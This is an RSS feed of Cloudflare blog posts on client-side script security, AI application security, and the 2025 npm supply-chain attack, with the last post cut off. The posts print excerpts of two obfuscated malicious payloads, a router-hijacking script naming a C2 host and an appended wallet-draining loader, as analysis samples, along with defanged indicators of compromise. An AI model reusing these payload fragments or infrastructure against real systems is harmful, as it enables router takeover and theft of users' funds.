
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Fri, 03 Apr 2026 17:07:00 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Cloudflare Client-Side Security: smarter detection, now open to everyone]]></title>
            <link>https://blog.cloudflare.com/client-side-security-open-to-everyone/</link>
            <pubDate>Mon, 30 Mar 2026 06:00:00 GMT</pubDate>
            <description><![CDATA[ We are opening our advanced Client-Side Security tools to all users, featuring a new cascading AI detection system. By combining graph neural networks and LLMs, we've reduced false positives by up to 200x while catching sophisticated zero-day exploits. ]]></description>
            <content:encoded><![CDATA[ <p>Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it needs is just one malicious script tag.</p><p>If that sounds abstract, here are two recent examples of such skimming attacks:</p><ul><li><p>In January 2026, <a href="https://sansec.io/research/keylogger-major-us-bank-employees"><u>Sansec reported</u></a> a browser-side keylogger running on an employee merchandise store for a major U.S. bank, harvesting personal data, login credentials, and credit card information.</p></li><li><p>In September 2025, attackers published malicious releases of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>widely used npm packages</u></a>. If those packages were bundled into front-end code, end users could be exposed to crypto-stealing in the browser.</p></li></ul><p>To further our goal of building a better Internet, Cloudflare established a core tenet during our <a href="https://www.cloudflare.com/innovation-week/birthday-week-2025/"><u>Birthday Week 2025</u></a>: powerful security features should be accessible <a href="https://blog.cloudflare.com/enterprise-grade-features-for-all/"><u>without requiring a sales engagement</u></a>. In pursuit of this objective, we are announcing two key changes today:</p><p>First, Cloudflare <b>Client-Side Security Advanced</b> (formerly <b>Page Shield add-on</b>) is now <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>available to self-serve</u></a> customers. And second, domain-based threat intelligence is now complimentary for all customers on the <a href="https://developers.cloudflare.com/page-shield/#availability"><u>free </u><b><u>Client-Side Security</u></b><u> bundle</u></a>.</p><p>In this post, we’ll explain how this product works and highlight a new AI detection system designed to identify malicious JavaScript while minimizing false alarms. We’ll also discuss several real-world applications for these tools.</p>
    <div>
      <h2>How Cloudflare Client-Side Security works</h2>
      <a href="#how-cloudflare-client-side-security-works">
        
      </a>
    </div>
    <p>Cloudflare Client-Side Security assesses 3.5 billion scripts per day, protecting 2,200 scripts per enterprise zone on average.</p><p>Under the hood, Client-Side Security collects these signals using browser reporting (for example, <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP"><u>Content Security Policy</u></a>), which means you don’t need scanners or app instrumentation to get started, and there is zero latency impact to your web applications. The only prerequisite is that your traffic is proxied through Cloudflare.</p><p>Client-Side Security <b>Advanced</b> provides immediate access to powerful security features:</p><ul><li><p><b>Smarter malicious script detection:</b> Using in-house machine learning, this capability is now enhanced with assessments from a Large Language Model (LLM). Read more details below.</p></li><li><p><b>Code change monitoring:</b> Continuous code change detection and monitoring is included, which is essential for meeting compliance like<a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"> <u>PCI DSS v4</u></a>, requirement 11.6.1.</p></li><li><p><b>Proactive blocking rules:</b> Benefit from positive content security rules that are maintained and enforced through continuous monitoring.</p></li></ul>
    <div>
      <h2>Detecting malicious intent JavaScripts</h2>
      <a href="#detecting-malicious-intent-javascripts">
        
      </a>
    </div>
    <p>Managing client-side security is a massive data problem. For an average enterprise zone, our systems observe approximately 2,200 unique scripts; smaller business zones frequently handle around 1,000. This volume alone is difficult to manage, but the real challenge is the volatility of the code.</p><p>Roughly a third of these scripts undergo code updates within any 30-day window. If a security team attempted to manually approve every new DOM (document object model) interaction or outbound connection, the resulting overhead would paralyze the development pipeline.</p><p>Instead, our detection strategy focuses on <i>what a script is trying to do</i>. That includes intent classification work <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>we’ve written about previously</u></a>. In short, we analyze the script's behavior using an Abstract Syntax Tree (AST). By breaking the code down into its logical structure, we can identify patterns that signal malicious intent, regardless of how the code is obfuscated.</p>
    <div>
      <h2>The high cost of false positives</h2>
      <a href="#the-high-cost-of-false-positives">
        
      </a>
    </div>
    <p>Client-side security operates differently than active vulnerability scanners deployed across the web, where a Web Application Firewall (WAF) would constantly observe matched attack signatures. While a WAF constantly blocks high-volume automated attacks, a client-side compromise (such as a breach of an origin server or a third-party vendor) is a rare, high-impact event. In an enterprise environment with rigorous vendor reviews and code scanning, these attacks are rare.</p><p>This rarity creates a problem. Because real attacks are infrequent, a security system’s detections are statistically more likely to be false positives. For a security team, these false alarms create fatigue and hide real threats. To solve this, we integrated a Large Language Model (LLM) into our detection pipeline, drastically reducing the false positive rate.</p>
    <div>
      <h2>Adding an LLM-based second opinion for triage</h2>
      <a href="#adding-an-llm-based-second-opinion-for-triage">
        
      </a>
    </div>
    <p>Our <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>frontline detection engine</u></a> is a Graph Neural Network (GNN). GNNs are particularly well-suited for this task: they operate on the Abstract Syntax Tree (AST) of the JavaScript code, learning structural representations that capture execution patterns regardless of variable renaming, minification, or obfuscation. In machine learning terms, the GNN learns an embedding of the code’s graph structure that generalizes across syntactic variations of the same semantic behavior.</p><p>The GNN is tuned for high recall. We want to catch novel, zero-day threats. Its precision is already remarkably high: less than 0.3% of total analyzed traffic is flagged as a false positive (FP). However, at Cloudflare’s scale of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>3.5 billion scripts assessed daily</u></a>, even a sub-0.3% FP rate translates to a volume of false alarms that can be disruptive to customers.</p><p>The core issue is a classic class imbalance problem. While we can collect extensive malicious samples, the sheer diversity of benign JavaScript across the web is practically infinite. Heavily obfuscated but perfectly legitimate scripts — like bot challenges, tracking pixels, ad-tech bundles, and minified framework builds — can exhibit structural patterns that overlap with malicious code in the GNN’s learned feature space. As much as we try to cover a huge variety of interesting benign cases, the model simply has not seen enough of this infinite variety during training.</p><p>This is precisely where Large Language Models (LLMs) complement the GNN. LLMs possess a deep semantic understanding of real-world JavaScript practices: they recognize domain-specific idioms, common framework patterns, and can distinguish sketchy-but-innocuous obfuscation from genuinely malicious intent.</p><p>Rather than replacing the GNN, we designed a cascading classifier architecture:</p><ol><li><p><b>Every script is first evaluated by the GNN</b>. If the GNN predicts the script as benign, the detection pipeline terminates immediately. <b>This incurs only the minimal latency of the GNN for the vast majority of traffic, completely bypassing the heavier computation time of the LLM</b>.</p></li><li><p>If the GNN flags the script as potentially malicious (above the decision threshold), the script is <b>forwarded to an open-source LLM</b> hosted on Cloudflare <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> for a second opinion.</p></li><li><p>The LLM, provided with a security-specialized prompt context, <b>semantically evaluates the script’s intent</b>. If it determines the script is benign, it overrides the GNN’s verdict.</p></li></ol><p>This two-stage design gives us the best of both worlds: the GNN’s high recall for structural malicious patterns, combined with the LLM’s broad semantic understanding to filter out false positives.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/438frLuYPU51j0uhtM5foj/10c53b3b3ccc84b00c754c872ad20492/image3.png" />
          </figure><p><a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/#training-the-model-to-detect-hidden-malicious-intent"><u>As we previously explained</u></a>, our GNN is trained on publicly accessible script URLs, the same scripts any browser would fetch. The LLM inference at runtime runs entirely within Cloudflare’s network via <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> using open-source models (we currently use <code>gpt-oss-120b</code>).</p><p>As an additional safety net, every script flagged by the GNN is logged to Cloudflare <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a> for posterior analysis. This allows us to continuously audit whether the LLM’s overrides are correct and catch any edge cases where a true attack might have been inadvertently filtered out. Yes, we dogfood our own storage products for our own ML pipeline.</p><p>The results from our internal evaluations on real production traffic are compelling. Focusing on total analyzed traffic under the JS Integrity threat category, the secondary LLM validation layer reduced false positives by nearly 3x: dropping the already low ~0.3% FP rate down to ~0.1%. When evaluating unique scripts, the impact is even more dramatic: the FP rate plummets a whopping ~200x, from ~1.39% down to just 0.007%.</p><p>At our scale, cutting the overall false positive rate by two-thirds translates to millions fewer false alarms for our customers every single day. Crucially, our True Positive (actual attack) detection capability includes a fallback mechanism:as noted above, we audit the LLM’s overrides to check for possible true attacks that were filtered by the LLM.</p><p>Because the LLM acts as a highly reliable precision filter in this pipeline, we can now afford to lower the GNN’s decision threshold, making it even more aggressive. This means we catch novel, highly obfuscated True Attacks that would have previously fallen just below the detection boundary, all without overwhelming customers with false alarms. In the next phase, we plan to push this even further.</p>
    <div>
      <h3>Catching zero-days in the wild: The <code>core.js</code> router exploit</h3>
      <a href="#catching-zero-days-in-the-wild-the-core-js-router-exploit">
        
      </a>
    </div>
    <p>This two-stage architecture is already proving its worth in the wild. Just recently, our detection pipeline flagged a novel, highly obfuscated malicious script (<code>core.js</code>) targeting users in specific regions.</p><p>In this case, the payload was engineered to commandeer home routers (specifically Xiaomi OpenWrt-based devices). Upon closer inspection via deobfuscation, the script demonstrated significant situational awareness: it queries the router's WAN configuration (dynamically adapting its payload using parameters like <code>wanType=dhcp</code>, <code>wanType=static</code>, and <code>wanType=pppoe</code>), overwrites the DNS settings to hijack traffic through Chinese public DNS servers, and even attempts to lock out the legitimate owner by silently changing the admin password. Instead of compromising a website directly, it had been injected into users' sessions via compromised browser extensions.</p><p>To evade detection, the script's core logic was heavily minified and packed using an array string obfuscator — a classic trick, but effective enough that traditional threat intelligence platforms like VirusTotal have not yet reported detections at the time of this writing.</p><p><b>Our GNN successfully revealed</b> the underlying malicious structure despite the obfuscation, and the <b>Workers AI LLM confidently confirmed</b> the intent. Here is a glimpse of the payload showing the target router API and the attempt to inject a rogue DNS server:</p>
            <pre><code>const _0x1581=['bXhqw','=sSMS9WQ3RXc','cookie','qvRuU','pDhcS','WcQJy','lnqIe','oagRd','PtPlD','catch','defaultUrl','rgXPslXN','9g3KxI1b','123123123','zJvhA','content','dMoLJ','getTime','charAt','floor','wZXps','value','QBPVX','eJOgP','WElmE','OmOVF','httpOnly','split','userAgent','/?code=10&amp;asyn=0&amp;auth=','nonce=','dsgAq','VwEvU','==wb1kHb9g3KxI1b','cNdLa','W748oghc9TefbwK','_keyStr','parse','BMvDU','JYBSl','SoGNb','vJVMrgXPslXN','=Y2KwETdSl2b','816857iPOqmf','uexax','uYTur','LgIeF','OwlgF','VkYlw','nVRZT','110594AvIQbs','LDJfR','daPLo','pGkLa','nbWlm','responseText','20251212','EKjNN','65kNANAl','.js','94963VsBvZg','WuMYz','domain','tvSin','length','UBDtu','pfChN','1TYbnhd','charCodeAt','/cgi-bin/luci/api/xqsystem/login','http://192.168.','trace','https://api.qpft5.com','&amp;newPwd=','mWHpj','wanType','XeEyM','YFBnm','RbRon','xI1bxI1b','fBjZQ','shift','=8yL1kHb9g3KxI1b','http://','LhGKV','AYVJu','zXrRK','status','OQjnd','response','AOBSe','eTgcy','cEKWR','&amp;dns2=','fzdsr','filter','FQXXx','Kasen','faDeG','vYnzx','Fyuiu','379787JKBNWn','xiroy','mType','arGpo','UFKvk','tvTxu','ybLQp','EZaSC','UXETL','IRtxh','HTnda','trim','/fee','=82bv92bv92b','BGPKb','BzpiL','MYDEF','lastIndexOf','wypgk','KQMDB','INQtL','YiwmN','SYrdY','qlREc','MetQp','Wfvfh','init','/ds','HgEOZ','mfsQG','address','cDxLQ','owmLP','IuNCv','=syKxEjUS92b','then','createOffer','aCags','tJHgQ','JIoFh','setItem','ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','Kwshb','ETDWH','0KcgeX92i0efbwK','stringify','295986XNqmjG','zfJMl','platform','NKhtt','onreadystatechange','88888888','push','cJVJO','XPOwd','gvhyl','ceZnn','fromCharCode',';Secure','452114LDbVEo','vXkmg','open','indexOf','UiXXo','yyUvu','ddp','jHYBZ','iNWCL','info','reverse','i4Q18Pro9TefbwK','mAPen','3960IiTopc','spOcD','dbKAM','ZzULq','bind','GBSxL','=A3QGRFZxZ2d','toUpperCase','AvQeJ','diWqV','iXtgM','lbQFd','iOS','zVowQ','jTeAP','wanType=dhcp&amp;autoset=1&amp;dns1=','fNKHB','nGkgt','aiEOB','dpwWd','yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW','encode','gWYAY','mckDW','createDataChannel'];
const _0x4b08=function(_0x5cc416,_0x2b0c4c){_0x5cc416=_0x5cc416-0x1d5;let _0xd00112=_0x1581[_0x5cc416];return _0xd00112;};
(function(_0x3ff841,_0x4d6f8b){const _0x45acd8=_0x4b08;while(!![]){try{const _0x1933aa=-parseInt(_0x45acd8(0x275))*-parseInt(_0x45acd8(0x264))+-parseInt(_0x45acd8(0x1ff))+parseInt(_0x45acd8(0x25d))+-parseInt(_0x45acd8(0x297))+parseInt(_0x45acd8(0x20c))+parseInt(_0x45acd8(0x26e))+-parseInt(_0x45acd8(0x219))*parseInt(_0x45acd8(0x26c));if(_0x1933aa===_0x4d6f8b)break;else _0x3ff841['push'](_0x3ff841['shift']());}catch(_0x8e5119){_0x3ff841['push'](_0x3ff841['shift']());}}}(_0x1581,0x842ab));</code></pre>
            <p>This is exactly the kind of sophisticated, zero-day threat that a static signature-based WAF would miss but our structural and semantic AI approach catches.</p>
    <div>
      <h4>Indicators of Compromise (IOCs)</h4>
      <a href="#indicators-of-compromise-iocs">
        
      </a>
    </div>
    <ul><li><p><b>URL:</b> hxxps://ns[.]qpft5[.]com/ads/core[.]js</p></li><li><p><b>SHA-256:</b> 4f2b7d46148b786fae75ab511dc27b6a530f63669d4fe9908e5f22801dea9202</p></li><li><p><b>C2 Domain:</b> hxxps://api[.]qpft5[.]com</p></li></ul>
    <div>
      <h2>Domain-based threat intelligence free for all</h2>
      <a href="#domain-based-threat-intelligence-free-for-all">
        
      </a>
    </div>
    <p>Today we are making domain-based threat intelligence available to all Cloudflare Client-Side Security customers, regardless of whether you use the Advanced offering.</p><p>In 2025, we saw many non-enterprise customers affected by client-side attacks, particularly those customers running webshops on the Magento platform. These attacks persisted for days or even weeks after they were publicized. Small and medium-sized companies often lack the enterprise-level resources and expertise needed to maintain a high security standard.</p><p>By providing domain-based threat intelligence to everyone, we give site owners a critical, direct signal of attacks affecting their users. This information allows them to take immediate action to clean up their site and investigate potential origin compromises.</p><p>To begin, simply enable Client-Side Security with a toggle <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>. We will then highlight any JavaScript or connections associated with a known malicious domain.</p>
    <div>
      <h2>Get started with Client-Side Security Advanced for PCI DSS v4</h2>
      <a href="#get-started-with-client-side-security-advanced-for-pci-dss-v4">
        
      </a>
    </div>
    <p>To learn more about Client-Side Security Advanced pricing, please visit <a href="https://www.cloudflare.com/plans/"><u>the plans page</u></a>. Before committing, we will estimate the cost based on your last month’s HTTP requests, so you know exactly what to expect.</p><p>Client-Side Security Advanced has all the tools you need to meet the requirements <a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"><u>of PCI DSS v4</u></a> as an e-commerce merchant, particularly 6.4.3 and 11.6.1. Sign up today <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6NYXSzUcRxDdj9UP0kouAK</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
        </item>
        <item>
            <title><![CDATA[AI Security for Apps is now generally available]]></title>
            <link>https://blog.cloudflare.com/ai-security-for-apps-ga/</link>
            <pubDate>Wed, 11 Mar 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare AI Security for Apps is now generally available, providing a security layer to discover and protect AI-powered applications, regardless of the model or hosting provider. We are also making AI discovery free for all plans, to help teams find and secure shadow AI deployments. ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare’s <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>AI Security for Apps</u></a> detects and mitigates threats to AI-powered applications. Today, we're announcing that it is generally available.</p><p>We’re shipping with new capabilities like detection for custom topics, and we're making AI endpoint discovery free for every Cloudflare customer—including those on Free, Pro, and Business plans—to give everyone visibility into where AI is deployed across their Internet-facing apps.</p><p>We're also announcing an expanded collaboration with IBM, which has chosen Cloudflare to deliver AI security to its cloud customers. And we’re partnering with Wiz to give mutual customers a unified view of their AI security posture.</p>
    <div>
      <h2>A new kind of attack surface</h2>
      <a href="#a-new-kind-of-attack-surface">
        
      </a>
    </div>
    <p>Traditional web applications have defined operations: check a bank balance, make a transfer. You can write deterministic rules to secure those interactions. </p><p>AI-powered applications and agents are different. They accept natural language and generate unpredictable responses. There's no fixed set of operations to allow or deny, because the inputs and outputs are probabilistic. Attackers can manipulate large language models to take unauthorized actions or leak sensitive data. Prompt injection, sensitive information disclosure, and unbounded consumption are just a few of the risks cataloged in the <a href="https://genai.owasp.org/llm-top-10/"><u>OWASP Top 10 for LLM Applications</u></a>.</p><p>These risks escalate as AI applications become agents. When an AI gains access to tool calls—processing refunds, modifying accounts, providing discounts, or accessing customer data—a single malicious prompt becomes an immediate security incident.</p><p>Customers tell us what they’re up against. "Most of Newfold Digital's teams are putting in their own Generative AI safeguards, but everybody is innovating so quickly that there are inevitably going to be some gaps eventually,” says Rick Radinger, Principal Systems Architect at Newfold Digital, which operates Bluehost, HostGator, and Domain.com. </p>
    <div>
      <h2>What AI Security for Apps does</h2>
      <a href="#what-ai-security-for-apps-does">
        
      </a>
    </div>
    <p>We built AI Security for Apps to address this. It sits in front of your AI-powered applications, whether you're using a third-party model or hosting your own, as part of Cloudflare's <a href="https://www.cloudflare.com/learning/cdn/glossary/reverse-proxy/"><u>reverse proxy</u></a>. It helps you (1) discover AI-powered apps across your web property, (2) detect malicious or off-policy behavior to those endpoints, and (3) mitigate threats via the familiar WAF rule builder. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xpmckBUupzELjYOSx5bAF/cace1ab2ed2dd54d8d7a7ff60587ef65/BLOG-3128_2.png" />
          </figure>
    <div>
      <h3>Discovery — now free for everyone</h3>
      <a href="#discovery-now-free-for-everyone">
        
      </a>
    </div>
    <p>Before you can protect your LLM-powered applications, you need to know where they're being used. We often hear from security teams who don’t have a complete picture of AI deployments across their apps, especially as the LLM market evolves and developers swap out models and providers. </p><p>AI Security for Apps automatically identifies LLM-powered endpoints across your web properties, regardless of where they’re hosted or what the model is. Starting today, this capability is free for every Cloudflare customer, including Free, Pro, and Business plans. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2dBKhU5VNbzAePDAnaHkTK/3f6a569e495e03c3e2afca4d6183e02d/image4.png" />
          </figure><p><sup><i>Cloudflare’s dashboard page of web assets, showing 2 example endpoints labelled as </i></sup><code><sup><i>cf-llm</i></sup></code></p><p>Discovering these endpoints automatically requires more than matching common path patterns like <code>/chat/completions</code>. Many AI-powered applications don't have a chat interface: think product search, property valuation tools, or recommendation engines. We built a <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#discovering-llm-powered-applications"><u>detection system that looks at how endpoints behave</u></a>, not what they're called. To confidently identify AI-powered endpoints, <a href="https://developers.cloudflare.com/api-shield/security/api-discovery/#requirements"><u>sufficient valid traffic</u></a> is required.</p><p>AI-powered endpoints that have been discovered will be visible under <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets"><u>Security → Web Assets</u></a>, labeled as <code>cf-llm</code>. For customers on a Free plan, endpoint discovery is initiated when you first navigate to the <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets/discovery"><u>Discovery page</u></a>. For customers on a paid plan, discovery occurs automatically in the background on a recurring basis. If your AI-powered endpoints have been discovered, you can review them immediately.</p>
    <div>
      <h3>Detection</h3>
      <a href="#detection">
        
      </a>
    </div>
    <p>AI Security for Apps detections follow the <a href="https://developers.cloudflare.com/waf/detections/"><u>always-on approach</u></a> for traffic to your AI-powered endpoints. Each prompt is run through multiple detection modules for prompt injection, PII exposure, and sensitive or toxic topics. The results—whether the prompt was malicious or not—are attached as metadata you can use in custom WAF rules to enforce your policies. We are continuously exploring ways to leverage our global network, which sees traffic from roughly <a href="https://w3techs.com/technologies/history_overview/proxy/all"><u>20% of the web</u></a>, to identify new attack patterns across millions of sites before they reach yours.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oGjcaUL5L9zlAkz8lSmXv/4354a9555135e19de5c93d3d113e6790/BLOG-3128_4.png" />
          </figure>
    <div>
      <h4>New in GA: Custom topics detection</h4>
      <a href="#new-in-ga-custom-topics-detection">
        
      </a>
    </div>
    <p>The product ships with built-in detection for common threats: prompt injections, <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#detecting-prompts-designed-to-leak-pii"><u>PII extraction</u></a>, and <a href="https://blog.cloudflare.com/block-unsafe-llm-prompts-with-firewall-for-ai/"><u>toxic topics</u></a>. But every business has its own definition of what's off-limits. A financial services company might need to detect discussions of specific securities. A healthcare company might need to flag conversations that touch on patient data. A retailer might want to know when customers are asking about competitor products.</p><p>The new custom topics feature lets you define these categories. You specify the topic, we inspect the prompt and output a relevance score that you can use to log, block, or handle however you decide. Our goal is to build an extensible tool that flexes to your use cases.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1WzPhy11ZmUXDGZjft4sY1/7ebfafaf2114eaba83a829694837fc2c/image1.png" />
          </figure><p><sup><i>Prompt relevance score inside of AI Security for Apps</i></sup></p>
    <div>
      <h4>New in GA: Custom prompt extraction</h4>
      <a href="#new-in-ga-custom-prompt-extraction">
        
      </a>
    </div>
    <p>AI Security for Apps enforces guardrails before unsafe prompts can reach your infrastructure. To run detections accurately and provide real-time protection, we first need to identify the prompt within the request payload. Prompts can live anywhere in a request body, and different LLM providers structure their APIs differently. OpenAI and most providers use <code>$.messages[*].content</code> for chat completions. Anthropic's batch API nests prompts inside <code>$.requests[*].params.messages[*].content</code>. Your custom property valuation tool might use <code>$.property_description</code>.</p><p>Out of the box, we support the standard formats used by OpenAI, Anthropic, Google Gemini, Mistral, Cohere, xAI, DeepSeek, and others. When we can't match a known pattern, we apply a default-secure posture and run detection on the entire request body. This can introduce false positives when the payload contains fields that are sensitive but don't feed directly to an AI model, for example, a <code>$.customer_name</code> field alongside the actual prompt might trigger PII detection unnecessarily.</p><p>Soon, you'll be able to define your own JSONPath expressions to tell us exactly where to find the prompt. This will reduce false positives and lead to more accurate detections. We're also building a prompt-learning capability that will automatically adapt to your application's structure over time.</p>
    <div>
      <h3>Mitigation</h3>
      <a href="#mitigation">
        
      </a>
    </div>
    <p>Once a threat is identified and scored, you can block it, log it, or deliver custom responses, using the same WAF rules engine you already use for the rest of your application security. The power of Cloudflare’s shared platform is that you can combine AI-specific signals with everything else we know about a request, represented by <a href="https://developers.cloudflare.com/ruleset-engine/rules-language/fields/reference/"><u>hundreds of fields</u></a> available in the WAF. A prompt injection attempt is suspicious. A prompt injection attempt from an IP that’s been probing your login page, using a browser fingerprint associated with previous attacks, and rotating through a botnet is a different story. Point solutions that only see the AI layer can’t make these connections.</p><p>This unified security layer is exactly what they need at Newfold Digital to discover, label, and protect AI endpoints, says Radinger: “We look forward to using it across all these projects to serve as a fail-safe."</p>
    <div>
      <h2>Growing ecosystem</h2>
      <a href="#growing-ecosystem">
        
      </a>
    </div>
    <p>AI Security for Applications will also be available through Cloudflare's growing ecosystem, including through integration with IBM Cloud. Through <a href="https://www.ibm.com/products/cloud-internet-services"><u>IBM Cloud Internet Services (CIS)</u></a>, end users can already procure advanced application security solutions and manage them directly through their IBM Cloud account. </p><p>We're also partnering with Wiz to connect AI Security for Applications with <a href="https://www.wiz.io/solutions/ai-spm"><u>Wiz AI Security</u></a>, giving mutual customers a unified view of their AI security posture, from model and agent discovery in the cloud to application-layer guardrails at the edge.</p>
    <div>
      <h2>How to get started</h2>
      <a href="#how-to-get-started">
        
      </a>
    </div>
    <p>AI Security for Apps is available now for Cloudflare’s Enterprise customers. Contact your account team to get started, or see the product in action with a <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>self-guided tour</u></a>.</p><p>If you're on a Free, Pro, or Business plan, you can use AI endpoint discovery today. Log in to your dashboard and navigate to <b>Security → Web Assets</b> to see which endpoints we've identified. Keep an eye out — we plan to make all AI Security for Apps capabilities available for customers on all plans soon.</p><p>For configuration details, see our <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Application Security]]></category>
            <category><![CDATA[Application Services]]></category>
            <guid isPermaLink="false">4MBDCV6FV61Xbyav3cW8Xy</guid>
            <dc:creator>Liam Reese</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Catherine Newcomb</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare’s client-side security made the npm supply chain attack a non-event]]></title>
            <link>https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/</link>
            <pubDate>Fri, 24 Oct 2025 17:10:43 GMT</pubDate>
            <description><![CDATA[ A recent npm supply chain attack compromised 18 popular packages. This post explains how Cloudflare’s graph-based machine learning model, which analyzes 3.5 billion scripts daily, was built to detect and block exactly this kind of threat automatically. ]]></description>
            <content:encoded><![CDATA[ <p>In early September 2025, attackers used a phishing email to compromise one or more trusted maintainer accounts on npm. They used this to publish malicious releases of 18 widely used npm packages (for example chalk, debug, ansi-styles) that account for more than <a href="https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised"><u>2 billion downloads per week</u></a>. Websites and applications that used these compromised packages were vulnerable to hackers stealing crypto assets (“crypto stealing” or “wallet draining”) from end users. In addition, compromised packages could also modify other packages owned by the same maintainers (using stolen npm tokens) and included code to <a href="https://unit42.paloaltonetworks.com/npm-supply-chain-attack/"><u>steal developer tokens for CI/CD pipelines and cloud accounts</u></a>.</p><p>As it relates to end users of your applications, the good news is that Cloudflare<a href="https://www.cloudflare.com/application-services/products/page-shield/"><u> Page Shield, our client-side security offering</u></a> will detect compromised JavaScript libraries and prevent crypto-stealing. More importantly, given the AI powering Cloudflare’s detection solutions, customers are protected from similar attacks in the future, as we explain below.</p>
            <pre><code>export default {
 aliceblue: [240, 248, 255],
 …
 yellow: [255, 255, 0],
 yellowgreen: [154, 205, 50]
}


const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66 …
</code></pre>
            <p><sub><i>Excerpt from the injected malicious payload, along with the rest of the innocuous normal code.</i></sub><sub> </sub><sub><i>Among other things, the payload replaces legitimate crypto addresses with attacker’s addresses (for multiple currencies, including bitcoin, ethereum, solana).</i></sub></p>
    <div>
      <h2>Finding needles in a 3.5 billion script haystack</h2>
